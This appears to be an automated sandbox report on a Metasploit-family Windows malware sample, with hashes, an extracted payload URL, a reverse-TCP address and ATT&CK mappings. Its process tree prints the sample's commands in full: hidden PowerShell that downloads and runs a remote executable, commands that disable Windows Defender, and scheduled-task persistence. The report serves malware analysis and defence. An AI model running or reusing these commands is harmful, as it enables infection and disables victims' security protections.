Analysis
-
max time kernel
139s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
24-12-2024 05:52
General
-
Target
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
-
Size
126KB
-
MD5
7176b040816932541eb9c2b91d90b29b
-
SHA1
137a9c4620366caff2a1d1c297b6ae8c6d28761d
-
SHA256
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
-
SHA512
1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
SSDEEP
3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
Malware Config
Extracted
https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe
Extracted
metasploit
windows/reverse_tcp
147.185.221.23:1121
Signatures
-
Disables service(s) 3 TTPs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 8 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 7 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A22B.tmp\A22C.tmp\A22D.bat C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\reddit.exe"C:\Users\Admin\AppData\Local\Temp\reddit.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe" /sc onlogon /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe" /sc minute /mo 1 /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D11B.tmp\D11C.tmp\D11D.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\reddit.exe"C:\Users\Admin\AppData\Local\Temp\reddit.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B793.tmp\B794.tmp\B795.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\reddit.exe"C:\Users\Admin\AppData\Local\Temp\reddit.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe1⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1F3.tmp\A1F4.tmp\A1F5.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\reddit.exe"C:\Users\Admin\AppData\Local\Temp\reddit.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5568e6222a8488c7ee4b5a5890392e98b
SHA190ddd2cd0063f10042bb07fd55778dc367d2077c
SHA25696bcdf5b85e760845420d4b647f4cf9e651b6b0653f54471b63c0582f5865c7f
SHA512c70ebf96b0c7ec1ceb334a95d477f4dab2e84c3865fb3cac86518a2003b3bec4a544c70d3b5201efb41fcd8c4ab24617a25d0f1b305833a99adf3480eb0c1d21
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
1KB
MD5b8c4955686786c70c28115a9ecd5aa31
SHA18b93f383747615a0576b7f5a85bb8cad3d751c99
SHA256be938cdc00904ca5501bfbc0b47b14665f535e3e95242ef21983970213b515e2
SHA512d938a8d600438c946f4bc75a5fada80f74cb068b852930f014dedd2eaf7a484e42ff6ddab66e1e5c66ce26a7a75c668a272fe34bcdfe9409f10a79a77f7c0fb1
-
Filesize
944B
MD5549d698d8d3ac8a2efa036b8792de3ae
SHA14bef67f45a993f63ea31805e3ebc7af87b3e9ff5
SHA2562b5cb44596277445e911730014706b0246f7a3a0fc676a05d222cb1ab745d437
SHA5120269e3480ee87541f006f9d6167fb1e574f6649237cd71d4e44d69442f389abd2b183b47d5d6402b7ed8003aa3e48515b9a52d8c3768b91999b4eadbb1882a67
-
Filesize
1KB
MD5af3659efe272ad4b8e08335b074e9f7e
SHA1b11c84f60c2dfee5b8929b3fd0f1104f6cacc10b
SHA2568fd5dd79bb581e51f670704de0085f923ac6e7fa8f870b1ad6c6ea9e96db7b2d
SHA51290e0358038469d76ef23bb63328615574701fe1568cbb0cd467ce4466d9938feae4dea735742ae705599f691fb4d37f03976d3f8e6f7e591ac927e6971458c98
-
Filesize
944B
MD5839300dba3461fcfa4df3e752e6ca29d
SHA10d77520c46cfba5268b5d3ce4ef3bf7dd2190162
SHA2562638591b2115af56e611fed1fb6cddfaafff31b974fa5d90f2b0a985ca5256b1
SHA512f06cb7ba2a3bbdf07044eec8f47f0912d47a9e7f2c9e8158f18bff9474e9725ae0bc245d05879978aee5bc0d18f62782854ce260af2e635c40bd693f046eec46
-
Filesize
2KB
MD5c0e9bc2dfff6e08df8196809b9bbf253
SHA1006e88ea359145c40a6bbca55e6f21b387999255
SHA25643c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11
SHA5125b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
72KB
MD523544090c6d379e3eca7343c4f05d4d2
SHA1c9250e363790a573e9921a68b7abe64f27e63df1
SHA256b439d22ed2c1e1f83f3c52d1a7307d9aee8b516166ab221cb6d67b188cd80f56
SHA5126aca78b0653e87ac80d7f562e6ab6d650f4d53d375cad043eb9613c7bbd642f7f82564a872b1b05520a77acbeba9da0540c4cd5a855a28a8188ebe3a4b57775c
-
Filesize
126KB
MD57176b040816932541eb9c2b91d90b29b
SHA1137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
SHA5121332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
8KB